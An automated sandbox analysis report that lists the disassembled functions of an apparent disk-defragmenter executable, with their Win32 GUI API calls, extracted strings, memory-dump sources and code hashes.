                                                                                                                                                                                                                                                                                                • Instruction ID: 2b0b8f5636e7c6e0b71de8e83816cfbf5980d60911305a15352c27ff1d92b02b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be8af0238dc030f08aca80df25955cefc0936c7b45c5ded25a6e09dc14720ccf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD61B5B1504345AFC314EF50CC85FABB7B8FF84344F50492EF94A92160EB79A985CB9A
                                                                                                                                                                                                                                                                                                Function 0040F790 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0040F806
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001215,00000000,00000000), ref: 0040F82F
                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 0040F845
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 0040F876
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040F88B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00407E20: CopyRect.USER32(?,?), ref: 00407F0C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00407E20: CopyRect.USER32(?,?), ref: 00407F1E
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001209,00000000,00000000), ref: 0040F9EE
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageRectSend$Copy$Client
                                                                                                                                                                                                                                                                                                • String ID: $6$8F
                                                                                                                                                                                                                                                                                                • API String ID: 201260696-978989186
                                                                                                                                                                                                                                                                                                • Opcode ID: 42de312bba28103fbd9c5fb933112db53f737e9031533f58468e5b08cd7e4db0
                                                                                                                                                                                                                                                                                                • Instruction ID: 8b216fbeb9dde18344444fa578b156f2309188772abd6b45e307a88af5c25f20
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42de312bba28103fbd9c5fb933112db53f737e9031533f58468e5b08cd7e4db0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4E141B15083429FD320DF25C580A9BFBE9FF88704F004A2EF49997381D778A949CB96
                                                                                                                                                                                                                                                                                                Function 00418660 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102F,00000000,00000000), ref: 004187CD
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004187EF
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 0041899B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001028,00000000,00000000), ref: 004189AF
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 004189C5
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001015,00000000,?), ref: 004189DB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CriticalEnterSection
                                                                                                                                                                                                                                                                                                • String ID: %.2f%%$%I64u$8F
                                                                                                                                                                                                                                                                                                • API String ID: 2245208738-1881348792
                                                                                                                                                                                                                                                                                                • Opcode ID: e8a4837ba97be504fd883f7b81f214d570e02bb173e6daae76494a95ea94b1e9
                                                                                                                                                                                                                                                                                                • Instruction ID: e1e33ad56b98f5e84924c458d64c7c6c02eb77d82da0e984fc61a5a5d3d1ca0d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8a4837ba97be504fd883f7b81f214d570e02bb173e6daae76494a95ea94b1e9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9EA16E71304201AFD368EB24CD85FAFB7B9AF88704F40491EF64697291DBB4AC45CB5A
                                                                                                                                                                                                                                                                                                Function 00402760 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,?), ref: 004027B1
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,?), ref: 00402863
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402041$3402042$8F$DiskDefrag$Images$close$open
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2649565445
                                                                                                                                                                                                                                                                                                • Opcode ID: cdc453c516630b020ec0cec2833834f757ecf7b414e406f0a32de656b7e70e72
                                                                                                                                                                                                                                                                                                • Instruction ID: 8150cbd10707325bb4a07bc8764e9056bc1ba0aa629cfab9f1adae748ae802a6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cdc453c516630b020ec0cec2833834f757ecf7b414e406f0a32de656b7e70e72
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8319EB579020027D61576254EA6FBE21661FC4B48F25C22FB30E7B3C2DEED9C41429E
                                                                                                                                                                                                                                                                                                Function 004537A0 Relevance: 15.3, APIs: 10, Instructions: 287COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f91c71cdff771b475ab66cf7fa24957df628f7f2d51a469e190cf7c95d6e8a29
                                                                                                                                                                                                                                                                                                • Instruction ID: be2023aef89e17b54fd3cfd96c880170c5f98da2cba37ae09b4ebda1ed5f38f7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f91c71cdff771b475ab66cf7fa24957df628f7f2d51a469e190cf7c95d6e8a29
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79C1F4B56083448FC310DF69C884A5BFBE9BFC9714F148A5EE9888B361C775E905CB92
                                                                                                                                                                                                                                                                                                Function 004181A0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 004181B6
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,00000006), ref: 00418204
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,000003FD), ref: 0041827F
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,000003FD), ref: 004182FA
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041833E
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00418350
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00000003,0000FFFE), ref: 004183AA
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RectWindow$ClientMessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F
                                                                                                                                                                                                                                                                                                • API String ID: 1071774122-180763933
                                                                                                                                                                                                                                                                                                • Opcode ID: 81f35ccb1619ef2e815f8add3878e72e1f22e65b62a8cf288e8ccd6dbd741210
                                                                                                                                                                                                                                                                                                • Instruction ID: 3d1e85c786be0547c74fbf31f73b40b43d39c9eef0f0cab4dee81a64cc519da0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81f35ccb1619ef2e815f8add3878e72e1f22e65b62a8cf288e8ccd6dbd741210
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9951B2713407026BD215EB60CD9AF6F73AAEBC4B04F04491CF6459B2D0EEB4E901879A
                                                                                                                                                                                                                                                                                                Function 00424430 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 157windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000004FF), ref: 00429964
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0042998F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: TranslateMessage.USER32(?), ref: 0042999A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: DispatchMessageW.USER32(?), ref: 004299A1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004299B0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000004FF), ref: 004299C9
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00424612
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00424C20: SendMessageW.USER32(?,000010A9,?,00000000), ref: 00424C61
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00424C20: SetForegroundWindow.USER32(?), ref: 00424C6D
                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,00000001,00000000), ref: 0042452F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Message$MultipleObjectsPeekSendWait$DispatchForegroundPostTranslateWindow
                                                                                                                                                                                                                                                                                                • String ID: "RightMenuDisk"$"RightMenuFile"$-AutoDefragmention$-BootTimeDefrag$8F$ScheduleStart
                                                                                                                                                                                                                                                                                                • API String ID: 784092869-485786108
                                                                                                                                                                                                                                                                                                • Opcode ID: dc55257c4458ac874c86a61cc18cc1c17bee00782c775f5169f385f524cd433c
                                                                                                                                                                                                                                                                                                • Instruction ID: c97898347ab5420be132615685895ca4f66fbeb7c47801a8b84119e28bf46611
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc55257c4458ac874c86a61cc18cc1c17bee00782c775f5169f385f524cd433c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E251C431304310AFC300EF15EDC5A6BB7E4EBD8755F84092EF54A92291DBB89988CB5A
                                                                                                                                                                                                                                                                                                Function 0042D380 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 90windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102F,?,00000000), ref: 0042D3DB
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D3F8
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D411
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D433
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D46C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F$Selected$`=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-3927076241
                                                                                                                                                                                                                                                                                                • Opcode ID: 277d209018b5d9a8a410fc2a0ed1bbfc6736054aef52b9b75753d9dc20516a73
                                                                                                                                                                                                                                                                                                • Instruction ID: 47af735872212f4aff9019aaa9f39296bd56d2d945b6e3696df55891068cb05b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 277d209018b5d9a8a410fc2a0ed1bbfc6736054aef52b9b75753d9dc20516a73
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4521D8757407117BE230EB79ED82F9BA3A4AB48B55F504A1AF705A72C1CAB4F801879C
                                                                                                                                                                                                                                                                                                Function 004275D0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ActiveMessageWindow
                                                                                                                                                                                                                                                                                                • String ID: 3400001$3400101$3401090$rY
                                                                                                                                                                                                                                                                                                • API String ID: 3610105657-3605576623
                                                                                                                                                                                                                                                                                                • Opcode ID: b7d0b320c8ac4bba339029e9d88ce301a028bf10c8a73a5048825e82f1bb1e34
                                                                                                                                                                                                                                                                                                • Instruction ID: 7aa1b3021184ad304fb6d47c852e9f0d985907e1382866191d812cb31a89d144
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7d0b320c8ac4bba339029e9d88ce301a028bf10c8a73a5048825e82f1bb1e34
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 872179F0A50301BBD7106BB49C4AB9A31A8AF54701F50C82BB50EE1550D7BCA8449B6D
                                                                                                                                                                                                                                                                                                Function 005FE841 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 005FE960
                                                                                                                                                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 005FEA6E
                                                                                                                                                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 005FEBC0
                                                                                                                                                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 005FEBDB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                                • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                                                                                • Opcode ID: 08a24b7a806b8d6ec1416d2dfd391db455ed87810685ef5def1f7c42871ac48a
                                                                                                                                                                                                                                                                                                • Instruction ID: e73f2a20be353d8c2df27e872894231c1fc0a654930275ec37afaed710c64779
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08a24b7a806b8d6ec1416d2dfd391db455ed87810685ef5def1f7c42871ac48a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57B14C3180020EDFCF15EFA4C9469BEBFB6FF54310B14456AEA016B222D779DA51CBA1
                                                                                                                                                                                                                                                                                                Function 004653B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004012D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004768A9,000000FF), ref: 00401305
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004012D0: LeaveCriticalSection.KERNEL32(00497DC0,?,?,?,?,?,?,004768A9,000000FF), ref: 00401316
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDC.USER32(00000000), ref: 004650D8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004650E9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004650F0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,00000058), ref: 004650F9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465108
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: ReleaseDC.USER32(00000000,00000000), ref: 0046512C
                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00465580
                                                                                                                                                                                                                                                                                                • SetRect.USER32 ref: 004655DE
                                                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000005,00000000,00000005,00000000), ref: 004655ED
                                                                                                                                                                                                                                                                                                • CreateFontW.GDI32(0000000E,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,Arial), ref: 00465611
                                                                                                                                                                                                                                                                                                • GdiplusStartup.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,00000005,00000000,00000005,00000000,?,00000000), ref: 00465655
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
